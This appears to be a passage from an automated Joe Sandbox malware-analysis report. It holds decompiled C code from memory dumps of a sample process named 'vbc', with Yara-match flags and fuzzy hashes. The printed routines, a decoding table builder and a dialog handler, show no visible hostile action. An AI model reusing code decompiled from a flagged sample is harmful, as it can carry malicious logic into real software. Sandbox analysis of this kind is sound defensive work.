                                                						_t181 = _t182 + _t182;
                                                					}
                                                					_t281 = _t234 << 2;
                                                					_t191 = _t299 + _t281 - 0x70;
                                                					_t269 =  *_t191;
                                                					_t183 = _t181 - _t269;
                                                					_v52 = _t183;
                                                					if(_t183 < 0) {
                                                						goto L64;
                                                					}
                                                					_v176 = _t168;
                                                					 *_t191 = _t269 + _t183;
                                                					_t192 = 0;
                                                					_t235 = _t234 - 1;
                                                					if(_t235 == 0) {
                                                						L21:
                                                						_t184 = _a4;
                                                						_t271 = 0;
                                                						do {
                                                							_t193 =  *_t184;
                                                							_t184 =  &(_t184[1]);
                                                							if(_t193 != _t168) {
                                                								_t232 = _t299 + _t193 * 4 - 0xb0;
                                                								_t236 =  *_t232;
                                                								 *((intOrPtr*)(0x432190 + _t236 * 4)) = _t271;
                                                								 *_t232 = _t236 + 1;
                                                							}
                                                							_t271 = _t271 + 1;
                                                						} while (_t271 < _a8);
                                                						_v16 = _v16 | 0xffffffff;
                                                						_v40 = _v40 & 0x00000000;
                                                						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
                                                						_t195 = _v8;
                                                						_t186 =  ~_a28;
                                                						_v12 = _t168;
                                                						_v180 = _t168;
                                                						_v36 = 0x432190;
                                                						_v240 = _t168;
                                                						if(_t195 > _v28) {
                                                							L62:
                                                							_t168 = 0;
                                                							if(_v52 == 0 || _v28 == 1) {
                                                								return _t168;
                                                							} else {
                                                								goto L64;
                                                							}
                                                						}
                                                						_v44 = _t195 - 1;
                                                						_v32 = _t299 + _t195 * 4 - 0x70;
                                                						do {
                                                							_t282 =  *_v32;
                                                							if(_t282 == 0) {
                                                								goto L61;
                                                							}
                                                							while(1) {
                                                								_t283 = _t282 - 1;
                                                								_t200 = _a28 + _t186;
                                                								_v48 = _t283;
                                                								_v24 = _t200;
                                                								if(_v8 <= _t200) {
                                                									goto L45;
                                                								}
                                                								L31:
                                                								_v20 = _t283 + 1;
                                                								do {
                                                									_v16 = _v16 + 1;
                                                									_t296 = _v28 - _v24;
                                                									if(_t296 > _a28) {
                                                										_t296 = _a28;
                                                									}
                                                									_t222 = _v8 - _v24;
                                                									_t254 = 1 << _t222;
                                                									if(1 <= _v20) {
                                                										L40:
                                                										_t256 =  *_a36;
                                                										_t168 = 1 << _t222;
                                                										_v40 = 1;
                                                										_t274 = _t256 + 1;
                                                										if(_t274 > 0x5a0) {
                                                											goto L64;
                                                										}
                                                									} else {
                                                										_t275 = _v32;
                                                										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
                                                										if(_t222 >= _t296) {
                                                											goto L40;
                                                										}
                                                										while(1) {
                                                											_t222 = _t222 + 1;
                                                											if(_t222 >= _t296) {
                                                												goto L40;
                                                											}
                                                											_t275 = _t275 + 4;
                                                											_t264 = _t263 + _t263;
                                                											_t175 =  *_t275;
                                                											if(_t264 <= _t175) {
                                                												goto L40;
                                                											}
                                                											_t263 = _t264 - _t175;
                                                										}
                                                										goto L40;
                                                									}
                                                									_t168 = _a32 + _t256 * 4;
                                                									_t297 = _t299 + _v16 * 4 - 0xec;
                                                									 *_a36 = _t274;
                                                									_t259 = _v16;
                                                									 *_t297 = _t168;
                                                									if(_t259 == 0) {
                                                										 *_a24 = _t168;
                                                									} else {
                                                										_t276 = _v12;
                                                										_t298 =  *((intOrPtr*)(_t297 - 4));
                                                										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
                                                										_a5 = _a28;
                                                										_a4 = _t222;
                                                										_t262 = _t276 >> _t186;
                                                										_a6 = (_t168 - _t298 >> 2) - _t262;
                                                										 *(_t298 + _t262 * 4) = _a4;
                                                									}
                                                									_t224 = _v24;
                                                									_t186 = _t224;
                                                									_t225 = _t224 + _a28;
                                                									_v24 = _t225;
                                                								} while (_v8 > _t225);
                                                								L45:
                                                								_t284 = _v36;
                                                								_a5 = _v8 - _t186;
                                                								if(_t284 < 0x432190 + _a8 * 4) {
                                                									_t205 =  *_t284;
                                                									if(_t205 >= _a12) {
                                                										_t207 = _t205 - _a12 + _t205 - _a12;
                                                										_v36 =  &(_v36[1]);
                                                										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
                                                										_t208 =  *((intOrPtr*)(_t207 + _a16));
                                                									} else {
                                                										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
                                                										_t208 =  *_t284;
                                                										_v36 =  &(_t284[1]);
                                                									}
                                                									_a6 = _t208;
                                                								} else {
                                                									_a4 = 0xc0;
                                                								}
                                                								_t286 = 1 << _v8 - _t186;
                                                								_t244 = _v12 >> _t186;
                                                								while(_t244 < _v40) {
                                                									 *(_t168 + _t244 * 4) = _a4;
                                                									_t244 = _t244 + _t286;
                                                								}
                                                								_t287 = _v12;
                                                								_t246 = 1 << _v44;
                                                								while((_t287 & _t246) != 0) {
                                                									_t287 = _t287 ^ _t246;
                                                									_t246 = _t246 >> 1;
                                                								}
                                                								_t288 = _t287 ^ _t246;
                                                								_v20 = 1;
                                                								_v12 = _t288;
                                                								_t251 = _v16;
                                                								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
                                                									L60:
                                                									if(_v48 != 0) {
                                                										_t282 = _v48;
                                                										_t283 = _t282 - 1;
                                                										_t200 = _a28 + _t186;
                                                										_v48 = _t283;
                                                										_v24 = _t200;
                                                										if(_v8 <= _t200) {
                                                											goto L45;
                                                										}
                                                										goto L31;
                                                									}
                                                									break;
                                                								} else {
                                                									goto L58;
                                                								}
                                                								do {
                                                									L58:
                                                									_t186 = _t186 - _a28;
                                                									_t251 = _t251 - 1;
                                                								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
                                                								_v16 = _t251;
                                                								goto L60;
                                                							}
                                                							L61:
                                                							_v8 = _v8 + 1;
                                                							_v32 = _v32 + 4;
                                                							_v44 = _v44 + 1;
                                                						} while (_v8 <= _v28);
                                                						goto L62;
                                                					}
                                                					_t277 = 0;
                                                					do {
                                                						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
                                                						_t277 = _t277 + 4;
                                                						_t235 = _t235 - 1;
                                                						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
                                                					} while (_t235 != 0);
                                                					goto L21;
                                                				}
                                                				 *_a24 =  *_a24 & 0x00000000;
                                                				 *_a28 =  *_a28 & 0x00000000;
                                                				return 0;
                                                			}











































































                                                0x00407567
                                                0x0040756f
                                                0x00407573
                                                0x00407575
                                                0x00407578
                                                0x0040757a
                                                0x0040757a
                                                0x0040757c
                                                0x00407583
                                                0x00407585
                                                0x00407585
                                                0x0040758b
                                                0x004075a0
                                                0x004075a8
                                                0x004075aa
                                                0x004075ac
                                                0x004075af
                                                0x004075b0
                                                0x004075b0
                                                0x004075b6
                                                0x00000000
                                                0x00000000
                                                0x004075b8
                                                0x004075bb
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004075bb
                                                0x004075bf
                                                0x004075c2
                                                0x004075c4
                                                0x004075c4
                                                0x004075c7
                                                0x004075cd
                                                0x004075ce
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004075ce
                                                0x004075d3
                                                0x004075d6
                                                0x004075d8
                                                0x004075d8
                                                0x004075de
                                                0x004075e0
                                                0x004075f1
                                                0x004075e4
                                                0x004075e8
                                                0x0040788d
                                                0x00000000
                                                0x0040788d
                                                0x004075ee
                                                0x004075ef
                                                0x004075ef
                                                0x004075f7
                                                0x004075fa
                                                0x004075fe
                                                0x00407600
                                                0x00407602
                                                0x00407605
                                                0x00000000
                                                0x00000000
                                                0x0040760d
                                                0x00407613
                                                0x00407615
                                                0x00407617
                                                0x00407618
                                                0x0040762d
                                                0x0040762d
                                                0x00407630
                                                0x00407632
                                                0x00407632
                                                0x00407634
                                                0x00407639
                                                0x0040763b
                                                0x00407642
                                                0x00407644
                                                0x0040764c
                                                0x0040764c
                                                0x0040764e
                                                0x0040764f
                                                0x0040765e
                                                0x00407662
                                                0x00407666
                                                0x00407669
                                                0x0040766c
                                                0x00407671
                                                0x00407674
                                                0x0040767a
                                                0x00407681
                                                0x00407687
                                                0x00407880
                                                0x00407880
                                                0x00407885
                                                0x00407894
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00407885
                                                0x00407694
                                                0x00407697
                                                0x0040769a
                                                0x0040769d
                                                0x004076a1
                                                0x00000000
                                                0x00000000
                                                0x004076ac
                                                0x004076af
                                                0x004076b0
                                                0x004076b2
                                                0x004076b8
                                                0x004076bb
                                                0x00000000
                                                0x00000000
                                                0x004076c1
                                                0x004076c2
                                                0x004076c5
                                                0x004076c8
                                                0x004076cb
                                                0x004076d1
                                                0x004076d3
                                                0x004076d3
                                                0x004076db
                                                0x004076df
                                                0x004076e4
                                                0x00407709
                                                0x0040770f
                                                0x00407711
                                                0x00407713
                                                0x00407716
                                                0x0040771f
                                                0x00000000
                                                0x00000000
                                                0x004076e6
                                                0x004076e6
                                                0x004076ef
                                                0x004076f3
                                                0x00000000
                                                0x00000000
                                                0x00407704
                                                0x00407704
                                                0x00407707
                                                0x00000000
                                                0x00000000
                                                0x004076f7
                                                0x004076fa
                                                0x004076fc
                                                0x00407700
                                                0x00000000
                                                0x00000000
                                                0x00407702
                                                0x00407702
                                                0x00000000
                                                0x00407704
                                                0x00407728
                                                0x0040772e
                                                0x00407738
                                                0x0040773a
                                                0x0040773f
                                                0x00407741
                                                0x00407777
                                                0x00407743
                                                0x00407743
                                                0x00407746
                                                0x00407749
                                                0x00407753
                                                0x00407756
                                                0x0040775d
                                                0x00407768
                                                0x0040776f
                                                0x0040776f
                                                0x00407779
                                                0x0040777c
                                                0x0040777e
                                                0x00407784
                                                0x00407784
                                                0x0040778d
                                                0x00407790
                                                0x00407795
                                                0x004077a4
                                                0x004077ac
                                                0x004077b1
                                                0x004077d5
                                                0x004077dd
                                                0x004077e1
                                                0x004077e7
                                                0x004077b3
                                                0x004077c1
                                                0x004077c4
                                                0x004077ca
                                                0x004077ca
                                                0x004077eb
                                                0x004077a6
                                                0x004077a6
                                                0x004077a6
                                                0x004077fc
                                                0x00407800
                                                0x0040780c
                                                0x00407807
                                                0x0040780a
                                                0x0040780a
                                                0x00407814
                                                0x00407819
                                                0x00407821
                                                0x0040781d
                                                0x0040781f
                                                0x0040781f
                                                0x00407827
                                                0x00407829
                                                0x00407830
                                                0x0040783a
                                                0x00407844
                                                0x00407860
                                                0x00407864
                                                0x004076a9
                                                0x004076af
                                                0x004076b0
                                                0x004076b2
                                                0x004076b8
                                                0x004076bb
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004076bb
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00407846
                                                0x00407846
                                                0x00407846
                                                0x0040784b
                                                0x00407854
                                                0x0040785d
                                                0x00000000
                                                0x0040785d
                                                0x0040786a
                                                0x0040786a
                                                0x0040786d
                                                0x00407874
                                                0x00407877
                                                0x00000000
                                                0x0040769a
                                                0x0040761a
                                                0x0040761c
                                                0x0040761c
                                                0x00407620
                                                0x00407623
                                                0x00407624
                                                0x00407624
                                                0x00000000
                                                0x0040761c
                                                0x00407590
                                                0x00407596
                                                0x00000000

                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                • Instruction ID: 4d3fc1c80ea15bf86cc2801d6424e98614acddb7a54358772128df9d71e60e61
                                                • Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                • Instruction Fuzzy Hash: C6C14871E042599BCF18CF68C8905EEBBB2BF88314F25866AD85677380D7347941CF95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000003.00000002.688715798.0000000003790000.00000040.00000800.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_3790000_vbc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9e8f1e5c10d567a146eac3befaed40d91b3358aa03453bf8e8bba8df58672655
                                                • Instruction ID: c07e940cd703ff66ada4104e3d7104eabb284a374690d49fc07cd47387e56a63
                                                • Opcode Fuzzy Hash: 9e8f1e5c10d567a146eac3befaed40d91b3358aa03453bf8e8bba8df58672655
                                                • Instruction Fuzzy Hash: A6417F725047849FFF70CE1AD9D47DAB7E2AF98310F99071BC95D9B600D331AA418B16
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000003.00000002.688715798.0000000003790000.00000040.00000800.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_3790000_vbc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e381175a31ddc42cadb7dd0d7650bd72de616b90f9123d8dfd5532ef6d1eb5be
                                                • Instruction ID: 2ca1a126e474a6cded71266453cf24a9683a6d4476534d20e3d9638c1fa3e9cf
                                                • Opcode Fuzzy Hash: e381175a31ddc42cadb7dd0d7650bd72de616b90f9123d8dfd5532ef6d1eb5be
                                                • Instruction Fuzzy Hash: 6D41E070A087858BEF71CF78D8D4BD97B95AF46324F0982AED8998F287D7744442CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000003.00000002.688715798.0000000003790000.00000040.00000800.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_3790000_vbc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4d3185ec23da6385a46639960b0475a8eead1425c1086c3fee4de75934e9b866
                                                • Instruction ID: e69ceb4c529812d471c0046becdbe443528f9e5b79a2f3e0c228f43c3796f488
                                                • Opcode Fuzzy Hash: 4d3185ec23da6385a46639960b0475a8eead1425c1086c3fee4de75934e9b866
                                                • Instruction Fuzzy Hash: 5B318F74908348AFEB68DF79CC845DABBE2EF86200F608A5DC9D98B356D63185439F41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000003.00000002.688715798.0000000003790000.00000040.00000800.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_3790000_vbc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e8b1a5ecb070331f6233eb960b526e390e9a8308daae32e2e934fca2ebf754a8
                                                • Instruction ID: accf590ec0ea0e1b1d530f0095d2c90b7a0ca388e891f5f8fd2e73fcc9d4f6d3
                                                • Opcode Fuzzy Hash: e8b1a5ecb070331f6233eb960b526e390e9a8308daae32e2e934fca2ebf754a8
                                                • Instruction Fuzzy Hash: 65217C79904349AFEB64EE358C845DBBBE2EF41200F615E5DC9D88B21AD2318543AB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000003.00000002.688715798.0000000003790000.00000040.00000800.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_3790000_vbc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dc00690f72794b724ac12dbd6da9ef1856509da5420c938f8a55dcbc1148162e
                                                • Instruction ID: 8b7c4eb60efaeecb302db0fbf731097819d3c4da274e7908d42cdd7c9240f47a
                                                • Opcode Fuzzy Hash: dc00690f72794b724ac12dbd6da9ef1856509da5420c938f8a55dcbc1148162e
                                                • Instruction Fuzzy Hash: 9B110575600B448FDB38CF18E884BA973B1BF59B20F84866AD8189B355D730EA50CB10
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000003.00000002.688715798.0000000003790000.00000040.00000800.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_3790000_vbc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8c3283c70f22bfd0ef2a60e1f734469ab085d0069b5dd443cceb28a9210722bb
                                                • Instruction ID: f9a6bfae084d858340a2ac940d9a321c7144b67e6f5efbc97714367feba99e4f
                                                • Opcode Fuzzy Hash: 8c3283c70f22bfd0ef2a60e1f734469ab085d0069b5dd443cceb28a9210722bb
                                                • Instruction Fuzzy Hash: BDF0A0BD655380DFD305DF24D8A9A54BFB0FB42200B2A8ADAE0198F6A3C225DC00DF41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000003.00000002.688715798.0000000003790000.00000040.00000800.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_3790000_vbc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 57bb1b06691b2ebd04d225b1a001f45b0016579b20906ca315ab54d274e9f462
                                                • Instruction ID: dd641c2dc245aff17366ab030c8c98600846ec155c070f30950d6437e9ae6b12
                                                • Opcode Fuzzy Hash: 57bb1b06691b2ebd04d225b1a001f45b0016579b20906ca315ab54d274e9f462
                                                • Instruction Fuzzy Hash: 59C08C8A5641721E2ED22A38336C19648129AA32F0B05C700DCA6BA11DC801CF490040
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000003.00000002.688715798.0000000003790000.00000040.00000800.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_3790000_vbc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
                                                • Instruction ID: a026a310f9d08bb1d858143eb29fddbf5fc3d9bc52f9beb0b7c2352c6f2dcf67
                                                • Opcode Fuzzy Hash: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
                                                • Instruction Fuzzy Hash: CDB002B66515819FEF56DB08D591B4073A4FB55648B0904D0E412DB712D224E910CA04
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000003.00000002.688715798.0000000003790000.00000040.00000800.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_3790000_vbc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
                                                • Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
                                                • Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
                                                • Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 96%
                                                			E00404F06(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                				struct HWND__* _v8;
                                                				struct HWND__* _v12;
                                                				long _v16;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				intOrPtr _v28;
                                                				signed char* _v32;
                                                				int _v36;
                                                				signed int _v44;
                                                				int _v48;
                                                				signed int* _v60;
                                                				signed char* _v64;
                                                				signed int _v68;
                                                				long _v72;
                                                				void* _v76;
                                                				intOrPtr _v80;
                                                				intOrPtr _v84;
                                                				void* _v88;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t198;
                                                				intOrPtr _t201;
                                                				long _t207;
                                                				signed int _t211;
                                                				signed int _t222;
                                                				void* _t225;
                                                				void* _t226;
                                                				int _t232;
                                                				long _t237;
                                                				long _t238;
                                                				signed int _t239;
                                                				signed int _t245;
                                                				signed int _t247;
                                                				signed char _t248;
                                                				signed char _t254;
                                                				void* _t258;
                                                				void* _t260;
                                                				signed char* _t278;
                                                				signed char _t279;
                                                				long _t284;
                                                				struct HWND__* _t291;
                                                				signed int* _t292;
                                                				int _t293;
                                                				long _t294;
                                                				signed int _t295;
                                                				void* _t297;
                                                				long _t298;
                                                				int _t299;
                                                				signed int _t300;
                                                				signed int _t303;
                                                				signed int _t311;
                                                				signed char* _t319;
                                                				int _t324;
                                                				void* _t326;
                                                
                                                				_t291 = _a4;
                                                				_v12 = GetDlgItem(_t291, 0x3f9);
                                                				_v8 = GetDlgItem(_t291, 0x408);
                                                				_t326 = SendMessageW;
                                                				_v24 =  *0x434f28;
                                                				_v28 =  *0x434f10 + 0x94;
                                                				if(_a8 != 0x110) {
                                                					L23:
                                                					if(_a8 != 0x405) {
                                                						_t301 = _a16;
                                                					} else {
                                                						_a12 = 0;
                                                						_t301 = 1;
                                                						_a8 = 0x40f;
                                                						_a16 = 1;
                                                					}
                                                					if(_a8 == 0x4e || _a8 == 0x413) {
                                                						_v16 = _t301;
                                                						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
                                                							if(( *0x434f19 & 0x00000002) != 0) {
                                                								L41:
                                                								if(_v16 != 0) {
                                                									_t237 = _v16;
                                                									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
                                                										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
                                                									}
                                                									_t238 = _v16;
                                                									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
                                                										_t301 = _v24;
                                                										_t239 =  *(_t238 + 0x5c);
                                                										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
                                                											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
                                                										} else {
                                                											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
                                                										}
                                                									}
                                                								}
                                                								goto L48;
                                                							}
                                                							if(_a8 == 0x413) {
                                                								L33:
                                                								_t301 = 0 | _a8 != 0x00000413;
                                                								_t245 = E00404E54(_v8, _a8 != 0x413);
                                                								_t295 = _t245;
                                                								if(_t295 >= 0) {
                                                									_t94 = _v24 + 8; // 0x8
                                                									_t301 = _t245 * 0x818 + _t94;
                                                									_t247 =  *_t301;
                                                									if((_t247 & 0x00000010) == 0) {
                                                										if((_t247 & 0x00000040) == 0) {
                                                											_t248 = _t247 ^ 0x00000001;
                                                										} else {
                                                											_t254 = _t247 ^ 0x00000080;
                                                											if(_t254 >= 0) {
                                                												_t248 = _t254 & 0x000000fe;
                                                											} else {
                                                												_t248 = _t254 | 0x00000001;
                                                											}
                                                										}
                                                										 *_t301 = _t248;
                                                										E0040117D(_t295);
                                                										_a12 = _t295 + 1;
                                                										_a16 =  !( *0x434f18) >> 0x00000008 & 0x00000001;
                                                										_a8 = 0x40f;
                                                									}
                                                								}
                                                								goto L41;
                                                							}
                                                							_t301 = _a16;
                                                							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                								goto L41;
                                                							}
                                                							goto L33;
                                                						} else {
                                                							goto L48;
                                                						}
                                                					} else {
                                                						L48:
                                                						if(_a8 != 0x111) {
                                                							L56:
                                                							if(_a8 == 0x200) {
                                                								SendMessageW(_v8, 0x200, 0, 0);
                                                							}
                                                							if(_a8 == 0x40b) {
                                                								_t225 =  *0x42d24c;
                                                								if(_t225 != 0) {
                                                									ImageList_Destroy(_t225);
                                                								}
                                                								_t226 =  *0x42d260;
                                                								if(_t226 != 0) {
                                                									GlobalFree(_t226);
                                                								}
                                                								 *0x42d24c = 0;
                                                								 *0x42d260 = 0;
                                                								 *0x434f60 = 0;
                                                							}
                                                							if(_a8 != 0x40f) {
                                                								L90:
                                                								if(_a8 == 0x420 && ( *0x434f19 & 0x00000001) != 0) {
                                                									_t324 = (0 | _a16 == 0x00000020) << 3;
                                                									ShowWindow(_v8, _t324);
                                                									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
                                                								}
                                                								goto L93;
                                                							} else {
                                                								E004011EF(_t301, 0, 0);
                                                								_t198 = _a12;
                                                								if(_t198 != 0) {
                                                									if(_t198 != 0xffffffff) {
                                                										_t198 = _t198 - 1;
                                                									}
                                                									_push(_t198);
                                                									_push(8);
                                                									E00404ED4();
                                                								}
                                                								if(_a16 == 0) {
                                                									L75:
                                                									E004011EF(_t301, 0, 0);
                                                									_v36 =  *0x42d260;
                                                									_t201 =  *0x434f28;
                                                									_v64 = 0xf030;
                                                									_v24 = 0;
                                                									if( *0x434f2c <= 0) {
                                                										L86:
                                                										if( *0x434fbe == 0x400) {
                                                											InvalidateRect(_v8, 0, 1);
                                                										}
                                                										if( *((intOrPtr*)( *0x433edc + 0x10)) != 0) {
                                                											E00404E0F(0x3ff, 0xfffffffb, E00404E27(5));
                                                										}
                                                										goto L90;
                                                									}
                                                									_t292 = _t201 + 8;
                                                									do {
                                                										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
                                                										if(_t207 != 0) {
                                                											_t303 =  *_t292;
                                                											_v72 = _t207;
                                                											_v76 = 8;
                                                											if((_t303 & 0x00000001) != 0) {
                                                												_v76 = 9;
                                                												_v60 =  &(_t292[4]);
                                                												_t292[0] = _t292[0] & 0x000000fe;
                                                											}
                                                											if((_t303 & 0x00000040) == 0) {
                                                												_t211 = (_t303 & 0x00000001) + 1;
                                                												if((_t303 & 0x00000010) != 0) {
                                                													_t211 = _t211 + 3;
                                                												}
                                                											} else {
                                                												_t211 = 3;
                                                											}
                                                											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
                                                											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
                                                											SendMessageW(_v8, 0x113f, 0,  &_v76);
                                                										}
                                                										_v24 = _v24 + 1;
                                                										_t292 =  &(_t292[0x206]);
                                                									} while (_v24 <  *0x434f2c);
                                                									goto L86;
                                                								} else {
                                                									_t293 = E004012E2( *0x42d260);
                                                									E00401299(_t293);
                                                									_t222 = 0;
                                                									_t301 = 0;
                                                									if(_t293 <= 0) {
                                                										L74:
                                                										SendMessageW(_v12, 0x14e, _t301, 0);
                                                										_a16 = _t293;
                                                										_a8 = 0x420;
                                                										goto L75;
                                                									} else {
                                                										goto L71;
                                                									}
                                                									do {
                                                										L71:
                                                										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
                                                											_t301 = _t301 + 1;
                                                										}
                                                										_t222 = _t222 + 1;
                                                									} while (_t222 < _t293);
                                                									goto L74;
                                                								}
                                                							}
                                                						}
                                                						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                							goto L93;
                                                						} else {
                                                							_t232 = SendMessageW(_v12, 0x147, 0, 0);
                                                							if(_t232 == 0xffffffff) {
                                                								goto L93;
                                                							}
                                                							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
                                                							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
                                                								_t294 = 0x20;
                                                							}
                                                							E00401299(_t294);
                                                							SendMessageW(_a4, 0x420, 0, _t294);
                                                							_a12 = _a12 | 0xffffffff;
                                                							_a16 = 0;
                                                							_a8 = 0x40f;
                                                							goto L56;
                                                						}
                                                					}
                                                				} else {
                                                					_v36 = 0;
                                                					_v20 = 2;
                                                					 *0x434f60 = _t291;
                                                					 *0x42d260 = GlobalAlloc(0x40,  *0x434f2c << 2);
                                                					_t258 = LoadImageW( *0x434f00, 0x6e, 0, 0, 0, 0);
                                                					 *0x42d254 =  *0x42d254 | 0xffffffff;
                                                					_t297 = _t258;
                                                					 *0x42d25c = SetWindowLongW(_v8, 0xfffffffc, E00405513);
                                                					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                					 *0x42d24c = _t260;
                                                					ImageList_AddMasked(_t260, _t297, 0xff00ff);
                                                					SendMessageW(_v8, 0x1109, 2,  *0x42d24c);
